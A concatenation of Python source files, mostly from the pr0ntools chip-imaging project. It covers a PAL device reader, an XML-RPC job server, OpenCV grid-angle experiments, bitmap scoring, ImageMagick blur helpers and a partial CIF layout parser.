print("Recursing on %u / %u (0x%02X, 0x%02X)" % (iteri + 1, len(pending_recurse), addr, word_clk))
child_parents = parents + [(addr, word_clk)]
for x in self.recursive_solver(found_states=found_states, parents=child_parents):
yield x
print("Returned, depth now %u" % len(parents))
def is_clkless(self, words):
"""
Registers are directly on the output
See if anything changed
"""
for (_addr, word_comb, word_clk) in words:
if word_comb != word_clk:
return False
return True
def words(self):
return 1 << len(self.I_LINES)
def run(self, fnout=None):
try:
self.tl.led(1)
# When clockless just brute force all inputs
if self.P_CLK is None:
if len(self.IO_LINES):
out = self.sweep_combclk_ioio()
else:
out = self.sweep_combclk_io(False)
# Otherwise explore FF states
else:
out = self.recursive_solver()
solver_header = next(out)
"""
# All states reached so far
closed_list = set()
add_closed_states(baseline, closed_list)
open_list = add_open_states(closed_list, baseline)
"""
if fnout:
def write_out(f, output):
for out in output:
f.write(json.dumps(out, sort_keys=True) + "\n")
f = open(fnout, "w")
jheader = {
"part": self.part,
"I_bits": len(self.I_LINES),
"words": self.words(),
"O_bits": len(self.O_LINES),
"pins": {
"CLK": self.P_CLK,
"OEn": self.P_OEn,
"I": self.I_LINES,
"O": self.O_LINES,
"IO": self.IO_LINES,
"VCC": self.P_VCC,
"GND": self.P_GND,
},
"soliver": solver_header,
}
write_out(f, [jheader])
write_out(f, out)
finally:
self.tl.init()
self.tl.led(0)
def run(port=None, part=None, fnout=None, input_pins=[], verbose=False):
tl = bitbang.Bitbang(port, verbose=verbose)
reader = PAL16XXReader(tl, part=part, input_pins=input_pins)
reader.run(fnout=fnout)
def main():
import argparse
parser = argparse.ArgumentParser(description='Read PAL device')
parser.add_argument('--port',
default=util.default_port(),
help='Device serial port')
parser.add_argument("--input-pins", default=None, help="Comma separated list of I/Os as inputs")
parser.add_argument("--verbose", action="store_true")
parser.add_argument('--part', required=True)
parser.add_argument("fnout", nargs='?')
args = parser.parse_args()
input_pins = None
if args.input_pins is not None:
input_pins = [int(x) for x in args.input_pins.split(",")]
run(port=args.port, part=args.part, fnout=args.fnout, input_pins=input_pins, verbose=args.verbose)
if __name__ == "__main__":
main()
``` |
{
"source": "JohnDMcMaster/pr0ntools",
"score": 3
} |
#### File: capture/cf/server.py
```python
import argparse
from multiprocessing import Process, Queue
from Queue import Empty
import time
import os
import shutil
import glob
import traceback
import multiprocessing
import json
from util import add_bool_arg
from SimpleXMLRPCServer import SimpleXMLRPCServer
from xmlrpclib import Binary
import datetime
class Server(object):
def __init__(self, indir, verbose=False):
self.running = True
self.server = None
self.indir = indir
self.verbose = verbose
# Unallocated
self.todo = set()
# Client has requested but not completed
self.outstanding = {}
self.completed = set()
def add_dir(self, indir):
# out.png means it should have completed successfully
# alternatively open every json file and see if it looks okay
print 'Scanning for new jobs: %s' % indir
for fn in glob.glob(indir + '/*/out.png'):
base = os.path.dirname(fn)
print ' Adding: %s' % base
self.todo.add(base)
print 'Scan complete'
def run(self):
print 'Building job list'
self.add_dir(self.indir)
print 'Starting server'
server = SimpleXMLRPCServer((args.bind, args.port), logRequests=self.verbose, allow_none=True)
server.register_introspection_functions()
server.register_multicall_functions()
#server.register_instance(self.rpc)
server.register_function(self.job_req, "job_req")
server.register_function(self.job_done, "job_done")
server.serve_forever()
'''
RPC
'''
def job_req(self):
try:
if args.reserve and len(self.todo) == 0:
print 'reserve: reloading'
self.outstanding = {}
self.completed = set()
self.add_dir(self.indir)
'''
In order to process the client needs:
-Output image (out.png)
-Image for grid (cropped or original if not rotating)
-Offsets into the original image (out.json)
'''
try:
base = self.todo.pop()
except KeyError:
# No jobs to hand out
print 'WARNING: client requested job but no jobs'
return None
print 'Allocating %s' % base
j = json.load(open(os.path.join(base, 'out.json')))
if j['pass'] != True:
raise Exception("Bad job %s" % base)
ret = {
'name': base,
'png': Binary(open(os.path.join(base, j['png'])).read()),
'img': Binary(open(os.path.join(base, j['img'])).read()),
'json': j,
}
self.outstanding[base] = {
'ret': ret,
# so can timeout clients that don't complete jobs
'tstart': time.time(),
}
return ret
except:
traceback.print_exc()
raise
'''
new_png may be None indicating the job was rejected
In this case msg must be set
Otherwise msg is optional
'''
def job_done(self, base, new_png, msg):
try:
print 'Completed: %s: %s' % (base, new_png is not None)
submit = self.outstanding[base]
print 'Time: %0.1f' % (time.time() - submit['tstart'],)
if new_png is not None:
open(os.path.join(base, 'sweep.png'), 'w').write(new_png.data)
open(os.path.join(base, 'sweep.txt'), 'w').write(msg)
self.completed.add(base)
del self.outstanding[base]
except:
traceback.print_exc()
raise
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='Grid auto-bitmap test')
# ord('pr') = 28786
parser.add_argument('--port', type=int, default=28786, help='TCP port number')
parser.add_argument('--bind', default='localhost', help='Address to bind to')
add_bool_arg(parser, '--debug', default=False)
add_bool_arg(parser, '--reserve', default=False)
parser.add_argument('dir', help='Directory to nom')
args = parser.parse_args()
s = Server(args.dir, args.debug)
s.run()
```
#### File: cf/test/02_angle.py
```python
import cv2
import numpy as np
import argparse
import pylab
import matplotlib
import os
from collections import Counter
from PIL import Image, ImageDraw, ImageStat
from scipy import fftpack
import random
import matplotlib.pyplot as plt
import sys
from scipy.optimize import leastsq
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='CV test')
parser.add_argument('fn_in', help='image file to process')
args = parser.parse_args()
outdir = '02_angle'
if not os.path.exists(outdir):
os.mkdir(outdir)
if 0:
img = cv2.imread(args.fn_in)
gray = cv2.cvtColor(img,cv2.COLOR_BGR2GRAY)
edges = cv2.Canny(gray,50,150,apertureSize = 3)
lines = cv2.HoughLines(edges,1,np.pi/1800,400)
for rho,theta in lines[0]:
a = np.cos(theta)
b = np.sin(theta)
x0 = a*rho
y0 = b*rho
x1 = int(x0 + 1000*(-b))
y1 = int(y0 + 1000*(a))
x2 = int(x0 - 1000*(-b))
y2 = int(y0 - 1000*(a))
cv2.line(img,(x1,y1),(x2,y2),(0,0,255),2)
cv2.imwrite(os.path.join(outdir, 'houghlines3_hi.jpg'),img)
if 0:
img = cv2.imread(args.fn_in)
gray = cv2.cvtColor(img,cv2.COLOR_BGR2GRAY)
edges = cv2.Canny(gray,50,150,apertureSize = 3)
minLineLength = 100
maxLineGap = 10
# TypeError: <unknown> is not a numpy array
lines = cv2.HoughLinesP(edges,1,np.pi/180,100,minLineLength,maxLineGap)
for x1,y1,x2,y2 in lines[0]:
cv2.line(img,(x1,y1),(x2,y2),(0,255,0),2)
cv2.imwrite('houghlines5.jpg',img)
# graph theta distribution
'''
1 degree was too course
0.1 degree seems okay
200 points produced bad result but 400 seems to be pretty good
'''
if 0:
img = cv2.imread(args.fn_in)
gray = cv2.cvtColor(img,cv2.COLOR_BGR2GRAY)
edges = cv2.Canny(gray,50,150,apertureSize = 3)
lines = cv2.HoughLines(edges,1,np.pi/1800.,400)
d = []
for rho,theta in lines[0]:
theta = theta * 180. / np.pi
# take out outliers
# I usually snap to < 1.5 so this should be plenty of margin
if theta < 3.0:
#print 'Theta: %g, rho: %g' % (theta, rho)
d.append(theta)
matplotlib.pyplot.clf()
pylab.hist(d, bins=100)
pylab.savefig(os.path.join(outdir, 'theta_dist_hi.png'))
# from a quick test in gimp
ideal = 0.94
# 400 point average
pre_meas = 0.889583
if 0:
angle = Counter(d).most_common(1)[0]
#angle_deg = angle * 180/np.pi
print 'Most common angle: %f (%d times)' % (angle[0], angle[1])
angle = angle[0]
# Off a little but better than original
if 1:
angle = sum(d) / len(d)
print 'Mean angle: %f' % (angle,)
im = Image.open(args.fn_in)
#im.save(os.path.join(outdir, 'orig.png'))
im = im.rotate(angle, resample=Image.BICUBIC)
im.save(os.path.join(outdir, 'rotate_hi.png'))
if 0:
img = cv2.imread(args.fn_in)
gray = cv2.cvtColor(img,cv2.COLOR_BGR2GRAY)
for thresh1 in [1, 10, 100, 250]:
for thresh2 in [1, 10, 100, 250]:
print
print thresh1, thresh2
# threshold1 - first threshold for the hysteresis procedure.
# threshold2 - second threshold for the hysteresis procedure.
edges = cv2.Canny(gray, thresh1, thresh2, apertureSize=3)
x0s = []
y0s = []
lines = cv2.HoughLines(edges,1,np.pi/1800,400)
linei = 0
if lines is None:
print 'WARNING: failed'
continue
for rho,theta in lines[0]:
a = np.cos(theta)
b = np.sin(theta)
x0 = a * rho
y0 = b * rho
scal = 2000
x1 = int(x0 + scal * -b)
y1 = int(y0 + scal * a)
x2 = int(x0 - scal * -b)
y2 = int(y0 - scal * a)
# only keep vertical lines for now
# these will have thetas close to 0 or pi
d = 0.1
if theta > 0 - d and theta < 0 + d or theta > np.pi - d and theta < np.pi + d:
x0s.append(abs(rho))
cv2.line(img, (x1,y1),(x2,y2),(0, 0, 255),2)
elif theta > np.pi/2 - d and theta < np.pi/2 + d or theta > 3 * np.pi / 2 - d and theta < 3 * np.pi / 2 + d:
y0s.append(abs(rho))
else:
cv2.line(img, (x1,y1),(x2,y2),(0, 255, 0),2)
continue
cv2.imwrite(os.path.join(outdir, 'thresh_%03d_%03d.png' % (thresh1, thresh2)),img)
print 'x0s: %d' % len(x0s)
if len(x0s) == 0:
print " WARNING: no lines"
print 'y0s: %d' % len(y0s)
if len(y0s) == 0:
print " WARNING: no lines"
import sys
sys.exit(1)
x0sd_roi = []
x0sd_all = []
for i in xrange(len(x0s)):
for j in xrange(i):
d = abs(x0s[i] - x0s[j])
x0sd_all.append(d)
if d < 100:
x0sd_roi.append(d)
print 'x0s: %d' % len(x0s)
matplotlib.pyplot.clf()
pylab.hist(x0sd_all, bins=100)
pylab.savefig(os.path.join(outdir, 'rotate_lines_histx_all.png'))
matplotlib.pyplot.clf()
pylab.hist(x0sd_roi, bins=100)
pylab.savefig(os.path.join(outdir, 'rotate_lines_histx_roi.png'))
if 0:
matplotlib.pyplot.clf()
pylab.hist(y0sd, bins=100)
pylab.savefig(os.path.join(outdir, 'rotate_lines_histy.png'))
if 0:
print 'writing to %s' % outdir
img = cv2.imread(args.fn_in)
print type(img)
gray = cv2.cvtColor(img,cv2.COLOR_BGR2GRAY)
cv2.imwrite(os.path.join(outdir, 'reduce_01_gray.png'), gray)
print type(gray)
edges = cv2.Canny(gray, 125, 250, apertureSize=3)
cv2.imwrite(os.path.join(outdir, 'reduce_02_edges.png'), edges)
print type(edges)
print len(edges)
sums = []
for row in edges:
sums.append(np.sum(row))
matplotlib.pyplot.clf()
plt.plot(sums)
pylab.savefig(os.path.join(outdir, 'reduce.png'))
# Find the highest value and annotate image
maxes = []
for i in xrange(5):
mval = max(sums)
ymax = sums.index(mval)
cv2.line(img, (0, ymax), (1527, ymax), (0, 0, 255), 2)
sums[ymax] = 0.0
cv2.imwrite(os.path.join(outdir, 'reduce_03_mark.png'), img)
# {'h': 0, 'o': 0, 'v': 78}
#lines = cv2.HoughLines(edges, 1, np.pi/1800, 400)
# {'h': 0, 'o': 0, 'v': 443}
#lines = cv2.HoughLines(edges, 1, np.pi/1800, 200)
# {'h': 0, 'o': 0, 'v': 723}
#lines = cv2.HoughLines(edges, 1, np.pi/1800, 150)
# {'h': 0, 'o': 0, 'v': 957}
#lines = cv2.HoughLines(edges, 1, np.pi/1800, 125)
lines = cv2.HoughLines(edges, 1, np.pi/1800, 115)
# {'h': 115, 'o': 34, 'v': 1494}
#lines = cv2.HoughLines(edges, 1, np.pi/1800, 100)
linei = 0
lc = {'h':0, 'v':0, 'o': 0}
for rho,theta in lines[0]:
# only keep vertical lines for now
# these will have thetas close to 0 or pi
d = 0.1
a = np.cos(theta)
b = np.sin(theta)
x0 = a * rho
y0 = b * rho
scal = 2000
x1 = int(x0 + scal * -b)
y1 = int(y0 + scal * a)
x2 = int(x0 - scal * -b)
y2 = int(y0 - scal * a)
if theta > 0 - d and theta < 0 + d or theta > np.pi - d and theta < np.pi + d:
lc['v'] += 1
#cv2.line(img,(x1,y1),(x2,y2),(0, 255, 0),2)
elif theta > np.pi/2 - d and theta < np.pi/2 + d or theta > 3 * np.pi / 2 - d and theta < 3 * np.pi / 2 + d:
print 'hor line'
cv2.line(img,(x1,y1),(x2,y2),(255, 0, 0),2)
lc['h'] += 1
else:
print 'other line'
cv2.line(img, (x1,y1),(x2,y2),(255, 255, 0),2)
lc['o'] += 1
print lc
cv2.imwrite(os.path.join(outdir, 'reduce_04_hough.png'), img)
sys.exit(1)
# works for one but not both axes
if 1:
print 'writing to %s' % outdir
img = cv2.imread(args.fn_in)
print type(img)
gray = cv2.cvtColor(img,cv2.COLOR_BGR2GRAY)
print type(gray)
edges = cv2.Canny(gray, 125, 250, apertureSize=3)
print type(edges)
print 'Edges: %d' % len(edges)
sums = []
for row in edges:
sums.append(np.sum(row))
matplotlib.pyplot.clf()
plt.plot(sums)
pylab.savefig(os.path.join(outdir, 'reduce_r.png'))
if 0:
print 'writing to %s' % outdir
img = cv2.imread(args.fn_in)
print type(img)
gray = cv2.cvtColor(img,cv2.COLOR_BGR2GRAY)
cv2.imwrite(os.path.join(outdir, 'reduce_01_gray.png'), gray)
print type(gray)
edges = cv2.Canny(gray, 125, 250, apertureSize=3)
print type(edges)
cv2.imwrite(os.path.join(outdir, 'reduce_02_edges.png'), edges)
#test = cv2.cvtColor(edges)
test = cv2.cv.GetMat(edges)
rowr = cv2.reduce(edges, 0, cv2.cv.CV_REDUCE_SUM)
colr = cv2.reduce(edges, 0, cv2.cv.CV_REDUCE_SUM)
matplotlib.pyplot.clf()
plt.subplot(211)
plt.plot(rowr)
plt.subplot(212)
plt.plot(colr)
pylab.savefig(os.path.join(outdir, 'reduce.png'))
matplotlib.pyplot.clf()
plt.plot(rowr)
pylab.savefig(os.path.join(outdir, 'reduce_r.png'))
matplotlib.pyplot.clf()
plt.plot(colr)
pylab.savefig(os.path.join(outdir, 'reduce_c.png'))
def dbg_grid(im):
'''Draw a grid onto the image to see that it lines up'''
im = im.copy()
draw = ImageDraw.Draw(im)
# +1: draw right bounding box
for c in xrange(cols + 1):
(m, b) = self.grid_lins[0]
x = int(m * c + b)
draw.line((x, 0, x, im.size[1]), fill=128)
for r in xrange(rows + 1):
(m, b) = self.grid_lins[1]
y = int(m * r + b)
draw.line((0, y, im.size[0], y), fill=128)
del draw
im.save(os.path.join(outdir, 'reduce_05_grid.png'))
del im
def gridify_offsets(self, m, x0s, y0s):
'''
Now that we know the line pitch need to fit it back to the original x and y data
Pitch is known, just play with offsets
Try to snap points to offset and calculate the error
Calcualte regression on pixels to get row/col pixel offset for grid lines
xline = col * m + b
'''
#points = sorted(x0s)
def res(p, points):
(b,) = p
err = []
for x in points:
xd = (x - b) / m
err.append(xd % 1)
return err
imw, imh = self.preproc_im.size
print 'X: regressing %d lines' % len(x0s)
(xres, _cov_x) = leastsq(res, [m/2], args=(x0s,))
print 'Optimal X offset: %s' % xres[0]
grid_xlin = (m, xres[0])
self.cols = int((imw - grid_xlin[1])/grid_xlin[0])
print 'Y: regressing %d lines' % len(y0s)
(yres, _cov_y) = leastsq(res, [m/2], args=(y0s,))
print 'Optimal Y offset: %s' % yres[0]
grid_ylin = (m, yres[0])
self.rows = int((imh - grid_ylin[1])/grid_ylin[0])
self.grid_lins = (grid_xlin, grid_ylin)
self.dbg_grid()
if 0:
angle2 = 1
im = Image.open(args.fn_in)
im = im.rotate(angle2)
F1 = fftpack.fft2(im)
print F1
if 0:
img = cv2.imread(args.fn_in)
gray = cv2.cvtColor(img,cv2.COLOR_BGR2GRAY)
edges = cv2.Canny(gray,50,150,apertureSize = 3)
x0s = []
lines = cv2.HoughLines(edges,1,np.pi/1800,400)
linei = 0
for rho,theta in lines[0]:
# only keep vertical lines for now
# these will have thetas close to 0 or pi
d = 0.1
if not (theta > 0 - d and theta < 0 + d or theta > 3.14 - d and theta < 3.14 + d):
continue
a = np.cos(theta)
b = np.sin(theta)
x0 = a * rho
y0 = b * rho
scal = 2000
x1 = int(x0 + scal * -b)
y1 = int(y0 + scal * a)
x2 = int(x0 - scal * -b)
y2 = int(y0 - scal * a)
# filter out lines at edge (lots of issues due to rotation)
#if x0 < 40 or y0 < 40:
# continue
x0s.append(abs(rho))
if 0:
print rho, theta
print ' ', x0, y0
print ' ', x1, y1, x2, y2
cv2.line(img,(x1,y1),(x2,y2),(0, 0, 255),2)
cv2.imwrite(os.path.join(outdir, 'rotate_lines.jpg'),img)
x0sd_roi = []
x0sd_all = []
for i in xrange(len(x0s)):
for j in xrange(i):
d = abs(x0s[i] - x0s[j])
x0sd_all.append(d)
if d < 100:
x0sd_roi.append(d)
print 'x0s: %d' % len(x0s)
# attempt to auto-cluster
# try to find the largest clusters along the same level of detail
print x0sd_roi
matplotlib.pyplot.clf()
pylab.hist(x0sd_roi, bins=100)
pylab.savefig(os.path.join(outdir, 'rotate_lines_histx_roi.png'))
```
#### File: pr0ntools/capture/example.py
```python
from PIL import Image
import os
import sys
from opencv.cv import *
from opencv.highgui import *
def analyzeImage(f,name):
im=Image.open(f)
try:
if(im.size[0]==1 or im.size[1]==1):
return
print (name+' : '+str(im.size[0])+','+ str(im.size[1]))
le=1
if(type(im.getpixel((0,0)))==type((1,2))):
le=len(im.getpixel((0,0)))
gray = cvCreateImage (cvSize (im.size[0], im.size[1]), 8, 1)
edge1 = cvCreateImage (cvSize (im.size[0], im.size[1]), 32, 1)
edge2 = cvCreateImage (cvSize (im.size[0], im.size[1]), 8, 1)
#edge3 = cvCreateImage (cvSize (im.size[0], im.size[1]), 32, 3)
for h in range(im.size[1]):
for w in range(im.size[0]):
p=im.getpixel((w,h))
if(type(p)==type(1)):
gray[h][w] = im.getpixel((w,h))
else:
gray[h][w] = im.getpixel((w,h))[0]
cvCornerHarris(gray,edge1,5,5,0.1)
cvCanny(gray,edge2,20,100)
cvNamedWindow("Grayscale")
cvShowImage("Grayscale", gray);
cvNamedWindow("Corner (Harris)")
cvShowImage("Corner (Harris)", edge1);
cvNamedWindow("Canny")
cvShowImage("Canny", edge2);
cvWaitKey()
f.close()
except Exception,e:
print e
print 'ERROR: problem handling '+ name
f = open(sys.argv[1],'r')
analyzeImage(f,sys.argv[1])
```
#### File: capture/tem/pp.py
```python
import json
from PIL import Image
import os
import numpy as np
import math
BIT_WH = 256
'''
{
u'bestk': 1,
u'res': [1.1362289094663497e-140, 3.902074920347574e-09],
u'pois': [574.7407407407408, 62.46765565962602],
u'meta': {
u'txt_fn': u'sega_315-5571_xpol_train2/sega_315-5571_xpol_17_27.txt',
u'glob_loc': [138, 223],
u'tile_loc': [2, 7],
u'lr': u'r',
u'im_fn': u'sega_315-5571_xpol_train2/sega_315-5571_xpol_17_27.png',
u'im_loc': [17, 27]
}
}
'''
def heatmap(j, fn_out, rg):
'''
Scale from green being the best matches to red being the worst
Black is no data
white: (255, 255, 255)
red: (255, 0, 0)
green: (255, 255, 0)
'''
im = Image.new("RGB", (BIT_WH, BIT_WH), "black")
# Start by building a map of all of the scores
scores = np.zeros(BIT_WH * BIT_WH)
for run in j['runs']:
col, row = run['meta']['glob_loc']
scores[row * BIT_WH + col] = run['res'][run['bestk']]
print 'Worst score: %g' % np.min(scores)
print 'Best score: %g' % np.max(scores)
scoresl = np.log(scores)
smin = np.min(scoresl)
smax = np.max(scoresl)
print 'Worst score: %g' % smin
print 'Best score: %g' % smax
# Normalize to 0 to 1
scoresn = (scoresl - smin) / (smax - smin)
print 'Worst score: %g' % np.min(scoresn)
print 'Best score: %g' % np.max(scoresn)
# red green
if rg:
for biti, score in enumerate(scoresn):
g = int(255 * score)
x = biti % BIT_WH
y = biti / BIT_WH
im.putpixel((x, y), (255 - g, g, 0))
# white bad
else:
for biti, score in enumerate(scoresn):
scorei = int(255 * (1 - score))
x = biti % BIT_WH
y = biti / BIT_WH
im.putpixel((x, y), (scorei, scorei, scorei))
im.save(fn_out)
# Display list of the worst score deltas
def find_worst(j, dir_out, worstn=6):
results = []
xyindex = {}
for runi, run in enumerate(j['runs']):
col, row = run['meta']['glob_loc']
# run['res'][run['bestk']]
score = abs(math.log(run['res'][1], 10) - math.log(run['res'][0], 10))
results.append((score, run))
xyindex[(col, row)] = runi
results = sorted(results)
def printr(i):
score, run = results[i]
#print run
m = run['meta']
print 'Score %f' % score
print ' fn: %s' % m['im_fn']
print ' tile_loc: %s' % (m['tile_loc'],)
print ' Actual: %s' % run['ref']
print ' Result: %s' % run['bestk']
print ' POIs'
for poi in run['pois']:
print ' %g' % poi
print ' us'
lr = m['lr']
for poi in run['pois']:
for bit in xrange(2):
k = '%d%s' % (bit, lr)
print ' %s' % k
for v in j['us'][k]:
print ' %g' % (v,)
print ' Scores'
for res in run['res']:
print ' %g' % res
print 'Worst %d results' % worstn
for i in xrange(worstn):
printr(i)
# Find what percentile had errors
# Work backwards until we find an error
last_err = -1
for i, result in enumerate(results):
score, run = result
m = run['meta']
if run['ref'] is not None and run['ref'] != run['bestk']:
last_err = i
if 0:
im_full = Image.open(m['im_fn'])
crop = m['crop']
im_tile = im_full.crop(crop)
im_tile.save(os.path.join(dir_out, '%d.png' % i))
# This number should be very small
# Otherwise errors are getting undetected despite having bad score
print
print 'Last error at %d / %d: %0.1f%%' % (last_err, len(results), 100.0 * last_err / len(results))
if last_err >= 0:
printr(last_err)
if 1:
i = last_err
score, run = results[i]
m = run['meta']
im_full = Image.open(m['im_fn'])
# crop = (xmin, ymin, xmin + imwh, ymin + imwh)
crop = m['crop']
im_tile = im_full.crop(crop)
#im_tile.show()
im_tile.save(os.path.join(dir_out, 'worst.png'))
print
print 'Known bad'
badb = 0
badn = 0
for x,y in [(35, 150), (36, 150), (13, 158), (38, 190), (30, 239)]:
i = xyindex[(x, y)]
printr(i)
score, run = results[i]
m = run['meta']
# This whole region should be 0's
if run['bestk'] == 1:
badb += 1
badn += 1
print 'Failed %d / %d' % (badb, badn)
def bitmap(j, fn_out):
im = Image.new("RGB", (BIT_WH, BIT_WH), "black")
# Start by building a map of all of the scores
scores = np.zeros(BIT_WH * BIT_WH)
for run in j['runs']:
col, row = run['meta']['glob_loc']
if run['bestk']:
im.putpixel((col, row), (255, 255, 255))
im.save(fn_out)
def run(fn):
print 'Loading'
j = json.load(open(fn, 'r'))
print 'Ready'
dir_out = os.path.dirname(fn)
#bitmap(j, os.path.join(dir_out, 'bitmap.png'))
#heatmap(j, os.path.join(dir_out, 'confidence_rg.png'), True)
#heatmap(j, os.path.join(dir_out, 'confidence_bw.png'), False)
find_worst(j, dir_out)
if __name__ == '__main__':
import argparse
parser = argparse.ArgumentParser(description='Grid auto-bitmap test')
parser.add_argument('fn', help='image file to process')
args = parser.parse_args()
run(args.fn)
```
#### File: pr0ntools/image/soften.py
```python
from pr0ntools.temp_file import ManagedTempFile
import os
import time
import subprocess
import sys
def soften_gauss(src_fn, dst_fn=None):
'''
http://www.imagemagick.org/Usage/convolve/#soft_blur
convert face.png -morphology Convolve Gaussian:0x3 face_strong_blur.png
convert face.png face_strong_blur.png \
-compose Blend -define compose:args=60,40% -composite \
face_soft_blur.png
If dest_file_name is not given, done in place
'''
sys.stdout.flush()
if not os.path.exists(src_fn):
raise Exception('Soften input file name missing')
if dst_fn is None:
dst_fn = src_fn
args = ["convert"]
args.append(src_fn)
args.append("-morphology")
args.append("Convolve")
args.append("Gaussian:0x3")
args.append(dst_fn)
print 'going to execute: %s' % (args,)
# Specifying nothing completely throws away the output
subp = subprocess.Popen(args, stdout=None, stderr=None, shell=False)
subp.communicate()
print 'Execute done, rc: %s' % (subp.returncode,)
if not subp.returncode == 0:
raise Exception('soften failed')
# having some problems that looks like file isn't getting written to disk
# monitoring for such errors
# remove if I can root cause the source of these glitches
for i in xrange(30):
if os.path.exists(dst_fn):
break
if i == 0:
print 'WARNING: soften missing strong blur dest file name %s, waiting a bit...' % (dst_fn,)
time.sleep(0.1)
else:
raise Exception('Missing soften strong blur output file name %s' % dst_fn)
def soften_composite(src_fn, dst_fn=None):
tmp_file = ManagedTempFile.from_same_extension(src_fn)
soften_gauss(src_fn, tmp_file.file_name)
if dst_fn is None:
dst_fn = src_fn
args = ["convert"]
args.append(src_fn)
args.append(tmp_file.file_name)
args.append("-compose")
args.append("Blend")
args.append("-define")
args.append("compose:args=60,40%")
args.append("-composite")
# If we got a dest file, use it
args.append(dst_fn)
print 'going to execute: %s' % (args,)
subp = subprocess.Popen(args, stdout=None, stderr=None, shell=False)
subp.communicate()
print 'Execute done, rc: %s' % (subp.returncode,)
if not subp.returncode == 0:
raise Exception('failed to form strong blur')
# having some problems that looks like file isn't getting written to disk
# monitoring for such errors
# remove if I can root cause the source of these glitches
for i in xrange(30):
if os.path.exists(dst_fn):
break
if i == 0:
print 'WARNING: soften missing strong blur dest file name %s, waiting a bit...' % (dst_fn,)
time.sleep(0.1)
else:
raise Exception('Missing soften strong blur output file name %s' % dst_fn)
```
#### File: jssim/cif/parser.py
```python
BOX_MAX = 200
BOX_MAX = None
box_limit = 0
g_print_result = False
if False:
from pr0ntools.jssim.layer import UVPolygon, Net, Nets, PolygonRenderer, Point
#g_print_result = True
clip_x_min = 250
clip_x_max = 360
clip_y_min = 150
clip_y_max = 250
# Flip since working coordinate system in flipped?
if True:
width = 1319
height = 820
clip_y_min = height - clip_y_min
clip_y_max = height - clip_y_max
g_limit_polygon = UVPolygon.from_rect_ex(clip_x_min, clip_y_min, clip_x_max - clip_x_min + 1, clip_y_max - clip_y_min + 1)
g_limit_polygon.color = 'white'
else:
g_limit_polygon = None
g_default_scalar = 0.007
#g_default_scalar = 1.0
class Layer:
# FIGURE B.1 CIF layer names for MOS processes.
# NM nMOS metal
NM = 'NM'
# NP nMOS polysilicon
NP = 'NP'
# ND nMOS diffusion
ND = 'ND'
# NC nMOS contact
NC = 'NC'
# NI nMOS implant
NI = 'NI'
# NB nMOS buried
NB = 'NB'
# NG nMOS overglass
NG = 'NG'
# CMF CMOS metal 1
CMF = 'CMF'
# CMS CMOS metal 2
CMS = 'CMS'
# CPG CMOS polysilicon
CPG = 'CPG'
# CAA CMOS active
CAA = 'CAA'
# CSG CMOS select
CSG = 'CSG'
# CWG CMOS well
CWG = 'CWG'
# CC CMOS contact
CC = 'CC'
# CVA CMOS via
CVA = 'CVA'
# COG CMOS overglass
COG = 'COG'
def __init__(self):
self.boxes = list()
self.id = None
@staticmethod
def str2id(s):
# Simple mapping right now
return s.upper()
def add_box(self, width, height, xpos, ypos, rotation = None):
box = Box(width, height, xpos, ypos, rotation)
self.boxes.append(box)
class Statement:
def __init__(self):
pass
class Subroutine:
def __init__(self):
self.number = None
# Strings, reparse every time
self.statements = list()
self.scale_numerator = None
self.scale_denominator = None
def add(self, statement):
self.statements.append(statement)
def call(self, parser):
scalar = self.scale_numerator / self.scale_denominator
for statement in self.statements:
parser.parse_statement(statement, scalar)
class Label:
def __init__(self, text = None, x = None, y = None, layer_id = None):
self.x = x
self.y = y
self.text = text
self.layer_id = layer_id
class Box:
def __init__(self, width, height, xpos, ypos, rotation = None):
if width == 0:
raise Exception('0 width')
if height == 0:
raise Exception('0 height')
self.width = width
self.height = height
self.xpos = xpos
self.ypos = ypos
self.rotation = rotation
class Parser:
'''
Initially created to parse 4003.cif
Makes use of the following constructs:
-(): comment
-Layers
-L ND: nMOS diffusion
-L NP: nMOS poly
-L NC: nMOS contact
-L NM: nMOS metal
-Procedural
-DS: def start
-DF def finish
-C call def
-B: box
-9: Cell name
-94: Label
-E: end
'''
def __init__(self):
global g_default_scalar
# maximized for 4003 on 1680 X 1040 screen...
# need to implement scrolling or something
self.scalar = g_default_scalar
#self.generator = None
self.file_name = None
# File object
self.f = None
self.cell_name = None
# layer ID => layer object
self.layers = dict()
# Transform into more polygon friendly form
self.corner_coordinates = True
# number => object
self.subroutines = dict()
# Being parsed, not running
self.cur_subroutine = None
self.labels = list()
self.active_layer = None
# Figure these out as we go along
self.width = 0
self.height = 0
def add_box(self, width, height, xpos, ypos, rotation = None):
self.width = max(self.width, xpos + width)
self.height = max(self.height, ypos + height)
self.active_layer.add_box(width, height, xpos, ypos, rotation)
def add_label(self, text, x, y, layer_id):
self.width = max(self.width, x)
self.height = max(self.height, y)
l = Label(text, x, y, layer_id)
self.labels.append(l)
@staticmethod
def parse(file_name):
parser = Parser()
#parser.generator = generator()
parser.file_name = file_name
parser.run()
return parser
def remove_comments(self, text):
# ( CIF conversion of visual6502 polygon data );
while True:
start = text.find('(')
if start < 0:
break
end = text.find(')')
if end < 0:
raise Exception('Malformed CIF: cannot locating ending ) on %s' % text)
text = text[0:start] + text[end + 1:]
#print 'filtered: ' + text
return text
def next_statement(self):
ret = ''
while True:
c = self.f.read(1)
if len(c) == 0:
if len(ret) == 0:
return None
break
if c == ';':
break
ret += c
return self.remove_comments(ret).strip()
def parse_statement(self, statement, scalar = None):
'''Must be comment free and stripped of extra spaces. Return True on end'''
global box_limit
global g_limit_polygon
# Skip blanks
if statement == '':
return False
if False:
scalar = 1.0
self.scalar = 1.0
#print 'Parising %s' % statement
parts = statement.split()
key = parts[0].upper()
print_orig = g_print_result
if self.cur_subroutine:
if key == "DF":
if self.cur_subroutine is None:
raise Exception('DF without DS')
# Note that we correctly drop the old routine if unneeded
self.subroutines[self.cur_subroutine.number] = self.cur_subroutine
# Not sure if this is true, but it seems logical anyway
self.active_layer = None
self.cur_subroutine = None
return False
else:
self.cur_subroutine.add(statement)
return False
ret = False
if key == "E":
ret = True
elif key == "L":
layer_id = Layer.str2id(parts[1])
# Hmm can you switch layers? Probably
if layer_id in self.layers:
self.active_layer = self.layers[layer_id]
else:
self.active_layer = Layer()
self.active_layer.id = layer_id
self.layers[layer_id] = self.active_layer
if BOX_MAX:
box_limit = 0
elif key == "C":
'''
Call a subroutine
Syntax:
C <number>
'''
self.subroutines[int(parts[1])].call(self)
print_orig = False
elif key == "DS":
'''
Define the start of a subroutine
Syntax:
DS <number> <scale numerator> <scale demon>
'''
subroutine = Subroutine()
subroutine.number = int(parts[1])
